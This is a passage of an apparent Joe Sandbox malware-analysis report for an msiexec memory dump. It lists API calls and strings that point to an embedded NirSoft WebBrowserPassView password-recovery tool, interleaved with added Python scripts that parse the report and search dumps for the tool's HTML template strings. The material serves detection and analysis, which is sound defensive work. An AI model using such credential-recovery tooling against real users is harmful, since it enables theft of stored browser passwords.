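• ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
• _snwprintf.MSVCRT ref: 0044488A
• wcscpy.MSVCRT ref: 004448B4
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: ??2@??3@_snwprintfwcscpy
• String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
• API String ID: 2899246560-1542517562
• Opcode ID: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
• Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
• Opcode Fuzzy Hash: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
• Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# One API call line: optional "Part of subcall function XXXXXXXX:" prefix, then name.MODULE,
# optional "(args)", then "ref: XXXXXXXX".  Decorated C++ names such as ??2@YAPAXI@Z are allowed.
API_CALL = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{8}): )?"
    r"(?P<name>[^\s.(]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})$"
)
META = re.compile(r"^(?P<key>[^:]+):\s*(?P<value>.*)$")


def _parse_call(m):
    args = m.group("args")
    return {
        "caller": m.group("caller"),  # address of the subcall owner, None for a direct call
        "name": m.group("name"),
        "module": m.group("module"),
        "args": args.split(",") if args else [],
        "ref": m.group("ref"),
    }


def parse_function_blocks(text):
    """Split the text export into function blocks: calls, referenced strings, metadata."""
    blocks, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":  # every function block opens with this header
            current = {"calls": [], "strings": [], "meta": {}}
            blocks.append(current)
            continue
        if line in SECTION_HEADERS or current is None:
            continue
        if line.startswith("•"):
            line = line[1:].strip()
        m = API_CALL.match(line)
        if m:
            current["calls"].append(_parse_call(m))
            continue
        m = META.match(line)
        if not m:
            continue
        key, value = m.group("key").strip(), m.group("value").strip()
        if key == "String ID":
            # "$" separates entries; a leading "$" yields an empty entry, which is dropped
            current["strings"] = [s for s in value.split("$") if s]
        else:
            current["meta"][key] = value
            if key == "Source File":
                off = re.search(r"Offset: ([0-9A-Fa-f]+)", value)
                if off:
                    current["meta"]["offset"] = int(off.group(1), 16)
    return blocks


def api_histogram(blocks, include_subcalls=False):
    """Count 'name.MODULE' over all blocks; direct calls only unless include_subcalls is set."""
    counts = Counter()
    for b in blocks:
        for call in b["calls"]:
            if include_subcalls or call["caller"] is None:
                counts[f'{call["name"]}.{call["module"]}'] += 1
    return counts


def find_by_string(blocks, needle):
    """Opcode IDs of every function whose referenced strings contain needle (case-sensitive)."""
    return [b["meta"]["Opcode ID"] for b in blocks
            if "Opcode ID" in b["meta"] and any(needle in s for s in b["strings"])]


if __name__ == "__main__":
    for b in parse_function_blocks(SAMPLE):
        print(b["meta"].get("Opcode ID"), len(b["calls"]), "calls", b["strings"][:3])
```

Run on a full report export, find_by_string(blocks, "VarFileInfo") returns the Opcode ID of the version-resource reader shown above, and the same ID can then be searched in other reports to see whether the same embedded tool turns up there; api_histogram gives a quick view of which imports the dumped code leans on before opening it in a disassembler.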
APIs
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
• ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
• memset.MSVCRT ref: 004085CF
• memset.MSVCRT ref: 004085F1
• memset.MSVCRT ref: 00408606
• strcmp.MSVCRT ref: 00408645
• _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
• _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
• memset.MSVCRT ref: 0040870E
• strcmp.MSVCRT ref: 0040876B
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
• CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
• String ID: ---
• API String ID: 3437578500-2854292027
• Opcode ID: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                                                                                                                                                          • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                          • memset.MSVCRT ref: 00410892
                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                          • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                          • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                          • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                          • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                          • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1010922700-0
                                                                                                                                                                                                          • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                                                                          • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                          • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                          • malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                          • free.MSVCRT ref: 004186C7
                                                                                                                                                                                                          • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                                                                          • free.MSVCRT ref: 004186E0
                                                                                                                                                                                                          • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                                                                          • malloc.MSVCRT ref: 004186FE
                                                                                                                                                                                                          • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                                                                          • free.MSVCRT ref: 00418716
                                                                                                                                                                                                          • free.MSVCRT ref: 0041872A
                                                                                                                                                                                                          • free.MSVCRT ref: 00418749
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: free$FullNamePath$malloc$Version
                                                                                                                                                                                                          • String ID: |A
                                                                                                                                                                                                          • API String ID: 3356672799-1717621600
                                                                                                                                                                                                          • Opcode ID: 96c66879b4041adad5e36cadfde5f9aa16ffca4bba1cd09b44366f464025a3b3
                                                                                                                                                                                                          • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96c66879b4041adad5e36cadfde5f9aa16ffca4bba1cd09b44366f464025a3b3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                                                          • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                                          • API String ID: 2081463915-1959339147
                                                                                                                                                                                                          • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                                                          • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                          • API String ID: 2012295524-70141382
                                                                                                                                                                                                          • Opcode ID: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                                                                                                                          • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                                          • API String ID: 667068680-3953557276
                                                                                                                                                                                                          • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                                          • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                                                                          • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                                                                          • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                                                                          • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                                                                            • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                                                                            • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                                                            • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                                                                          • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1700100422-0
                                                                                                                                                                                                          • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                                          • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                                                                          • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                                                                          • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                                                                          • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                                                                          • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                                                                          • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 552707033-0
                                                                                                                                                                                                          • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                          • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$_snwprintf
                                                                                                                                                                                                          • String ID: %%0.%df
                                                                                                                                                                                                          • API String ID: 3473751417-763548558
                                                                                                                                                                                                          • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                                                          • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                                                                          • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                                                                          • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00406136
                                                                                                                                                                                                          • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                                                                          • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                                                                          • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                                                                          • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                                                                          • String ID: A
                                                                                                                                                                                                          • API String ID: 2892645895-3554254475
                                                                                                                                                                                                          • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                                          • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                                                                                                            • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                                                                                                            • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                                                                            • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                                                                                                            • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                                                                                                          • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                                                                                                          • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                                                                                                          • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040DA23
                                                                                                                                                                                                          • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                                                                                                          • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                                                                                                          • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                                                                                                            • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                                                                          • String ID: caption
                                                                                                                                                                                                          • API String ID: 973020956-4135340389
                                                                                                                                                                                                          • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
• Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
• Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
• Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
APIs
Strings
• <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
• <table dir="rtl"><tr><td>, xrefs: 00410B00
• <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
• <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: memset$_snwprintf$wcscpy
• String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
• API String ID: 1283228442-2366825230
• Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
• Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
• Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
• Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
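The four format strings listed for this function are the HTML report template of a NirSoft password-recovery tool, which is what the "Yara detected WebBrowserPassView password recovery tool" signature keys on. A quick way to confirm that finding against a raw memory dump is to search for those exact strings and report where they sit. The script below is an added example, not part of the Joe Sandbox report and not the sandbox's own YARA logic: the template strings are copied from the entry above, the image base 0x400000 comes from the "Offset: 00400000" line, the sample dump is constructed inside the script, and searching both ANSI and UTF-16LE is an assumption about how the embedded tool stores them (the `_snwprintf`/`wcscpy` API ID suggests wide strings, but the report does not say).

```python
"""Search a raw memory dump for the NirSoft HTML report template strings.

Added example, not code from the Joe Sandbox report.  The four strings are
taken from the report's Strings section; the dump scanned here is a
synthetic buffer built by build_sample_dump(), not the real msiexec region.
"""

# Template strings exactly as listed in the report (xrefs 00410A70..00410B3C).
NIRSOFT_TEMPLATE_STRINGS = [
    '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">',
    "<meta http-equiv='content-type' content='text/html;charset=%s'>",
    '<table dir="rtl"><tr><td>',
    '<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>',
]

# "Offset: 00400000" in the Memory Dump Source line: the dump starts at the
# image base, so dump offset + 0x400000 is the virtual address.
IMAGE_BASE = 0x400000

# Assumption: the tool may store the template as ANSI or as UTF-16LE, so
# both byte encodings are searched.
ENCODINGS = ("ascii", "utf-16le")


def find_template_strings(dump: bytes, image_base: int = IMAGE_BASE):
    """Return sorted (virtual_address, encoding, template_string) hits."""
    hits = []
    for text in NIRSOFT_TEMPLATE_STRINGS:
        for enc in ENCODINGS:
            needle = text.encode(enc)
            pos = dump.find(needle)
            while pos >= 0:
                hits.append((image_base + pos, enc, text))
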